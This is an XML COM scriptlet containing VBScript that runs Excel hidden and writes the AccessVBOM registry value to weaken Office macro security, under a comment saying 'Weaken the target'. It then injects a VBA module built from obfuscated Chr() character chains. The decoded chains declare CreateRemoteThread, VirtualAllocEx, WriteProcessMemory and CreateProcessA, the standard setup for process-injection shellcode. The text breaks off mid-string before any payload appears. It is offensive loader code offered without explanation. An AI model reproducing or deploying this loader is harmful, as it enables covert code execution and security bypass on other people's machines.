<?XML version="1.0"?>
<scriptlet>
	<registration progid="DHTD4J6O" classid="{727a506f-0b00-4fdb-aeca-8eb4c630c79a}" >
		
	<script language="vbscript">
	<![CDATA[
		Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule

Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = False

Set WshShell = CreateObject("Wscript.Shell")

function RegExists(regKey)
	on error resume next
	WshShell.RegRead regKey
	RegExists = (Err.number = 0)
end function

' Get the old AccessVBOM value
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office" & objExcel.Version & "\Excel\Security\AccessVBOM"

if RegExists(RegPath) then
	action = WshShell.RegRead(RegPath)
else
	action = ""
end if

' Weaken the target
WshShell.RegWrite RegPath, 1, "REG_DWORD"

' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(10)& _
Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(104)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)& _
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(73)&Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _
Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(73)&Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)& _
Chr(10)&Chr(10)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(99)& _
Chr(98)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(108)&Chr(112)&Chr(82)&Chr(101)&Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)&Chr(100)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)& _
Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(108)&Chr(112)&Chr(68)&Chr(101)&Chr(115)&Chr(107)&Chr(116)&Chr(111)&Chr(112)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(108)& _
Chr(112)&Chr(84)&Chr(105)&Chr(116)&Chr(108)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(88)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _
Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(89)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(88)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(89)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(88)& _
Chr(67)&Chr(111)&Chr(117)&Chr(110)&Chr(116)&Chr(67)&Chr(104)&Chr(97)&Chr(114)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(89)&Chr(67)&Chr(111)&Chr(117)&Chr(110)&Chr(116)&Chr(67)& _
Chr(104)&Chr(97)&Chr(114)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(70)&Chr(105)&Chr(108)&Chr(108)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)& _
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(100)&Chr(119)&Chr(70)&Chr(108)&Chr(97)&Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)& _
Chr(32)&Chr(119)&Chr(83)&Chr(104)&Chr(111)&Chr(119)&Chr(87)&Chr(105)&Chr(110)&Chr(100)&Chr(111)&Chr(119)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(73)&Chr(110)&Chr(116)&Chr(101)&Chr(103)&Chr(101)&Chr(114)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(99)&Chr(98)&Chr(82)&Chr(101)& _
Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)&Chr(100)&Chr(50)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(73)&Chr(110)&Chr(116)&Chr(101)&Chr(103)&Chr(101)&Chr(114)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(108)&Chr(112)&Chr(82)&Chr(101)&Chr(115)&Chr(101)&Chr(114)&Chr(118)&Chr(101)& _
Chr(100)&Chr(50)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(104)&Chr(83)&Chr(116)&Chr(100)&Chr(73)&Chr(110)&Chr(112)&Chr(117)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _
Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(104)&Chr(83)&Chr(116)&Chr(100)&Chr(79)&Chr(117)&Chr(116)&Chr(112)&Chr(117)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(104)&Chr(83)&Chr(116)&Chr(100)& _
Chr(69)&Chr(114)&Chr(114)&Chr(111)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(10)&Chr(10)&Chr(35)&Chr(73)&Chr(102)&Chr(32)&Chr(86)&Chr(66)&Chr(65)&Chr(55)& _
Chr(32)&Chr(84)&Chr(104)&Chr(101)&Chr(110)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)&Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)& _
Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)& _
Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(82)&Chr(101)&Chr(109)&Chr(111)&Chr(116)&Chr(101)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(34)& _
Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _
Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)& _
Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(83)&Chr(116)&Chr(97)&Chr(99)&Chr(107)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(83)& _
Chr(116)&Chr(97)&Chr(114)&Chr(116)&Chr(65)&Chr(100)&Chr(100)&Chr(114)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(80)&Chr(97)&Chr(114)&Chr(97)&Chr(109)&Chr(101)& _
Chr(116)&Chr(101)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(70)&Chr(108)&Chr(97)& _
Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(73)&Chr(68)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)& _
Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)& _
Chr(116)&Chr(114)&Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)& _
Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(86)&Chr(105)&Chr(114)&Chr(116)&Chr(117)&Chr(97)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(69)&Chr(120)&Chr(34)& _
Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)& _
Chr(108)&Chr(112)&Chr(65)&Chr(100)&Chr(100)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)& _
Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(102)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)& _
Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(102)&Chr(108)&Chr(80)&Chr(114)&Chr(111)&Chr(116)&Chr(101)&Chr(99)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)& _
Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)&Chr(116)&Chr(114)& _
Chr(83)&Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)& _
Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(77)&Chr(101)&Chr(109)&Chr(111)&Chr(114)& _
Chr(121)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)& _
Chr(108)&Chr(32)&Chr(108)&Chr(68)&Chr(101)&Chr(115)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(82)&Chr(101)&Chr(102)&Chr(32)&Chr(83)&Chr(111)&Chr(117)&Chr(114)&Chr(99)&Chr(101)& _
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(101)&Chr(110)&Chr(103)&Chr(116)&Chr(104)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)& _
Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(101)&Chr(110)&Chr(103)&Chr(116)&Chr(104)&Chr(87)&Chr(114)&Chr(111)&Chr(116)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _
Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(80)&Chr(116)&Chr(114)&Chr(83)& _
Chr(97)&Chr(102)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(82)&Chr(117)&Chr(110)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)& _
Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)& _
Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(65)&Chr(112)&Chr(112)&Chr(108)&Chr(105)&Chr(99)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(78)&Chr(97)&Chr(109)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)& _
Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(67)&Chr(111)&Chr(109)&Chr(109)&Chr(97)&Chr(110)&Chr(100)&Chr(76)&Chr(105)&Chr(110)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)& _
Chr(112)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)& _
Chr(101)&Chr(97)&Chr(100)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(98)&Chr(73)&Chr(110)&Chr(104)& _
Chr(101)&Chr(114)&Chr(105)&Chr(116)&Chr(72)&Chr(97)&Chr(110)&Chr(100)&Chr(108)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(67)&Chr(114)&Chr(101)& _
Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(70)&Chr(108)&Chr(97)&Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(109)&Chr(101)&Chr(110)& _
Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(67)&Chr(117)&Chr(114)&Chr(114)&Chr(101)&Chr(110)&Chr(116)&Chr(68)&Chr(105)&Chr(114)&Chr(101)&Chr(99)&Chr(116)&Chr(111)& _
Chr(114)&Chr(121)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(83)&Chr(116)&Chr(97)&Chr(114)&Chr(116)&Chr(117)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)& _
Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(114)&Chr(109)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)& _
Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _
Chr(10)&Chr(35)&Chr(69)&Chr(108)&Chr(115)&Chr(101)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)& _
Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)& _
Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(82)&Chr(101)&Chr(109)&Chr(111)&Chr(116)&Chr(101)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)& _
Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)& _
Chr(100)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(83)&Chr(116)&Chr(97)& _
Chr(99)&Chr(107)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(83)&Chr(116)&Chr(97)&Chr(114)&Chr(116)&Chr(65)&Chr(100)&Chr(100)& _
Chr(114)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(80)&Chr(97)&Chr(114)&Chr(97)&Chr(109)&Chr(101)&Chr(116)&Chr(101)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)& _
Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(70)&Chr(108)&Chr(97)&Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)& _
Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(73)&Chr(68)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)& _
Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)& _
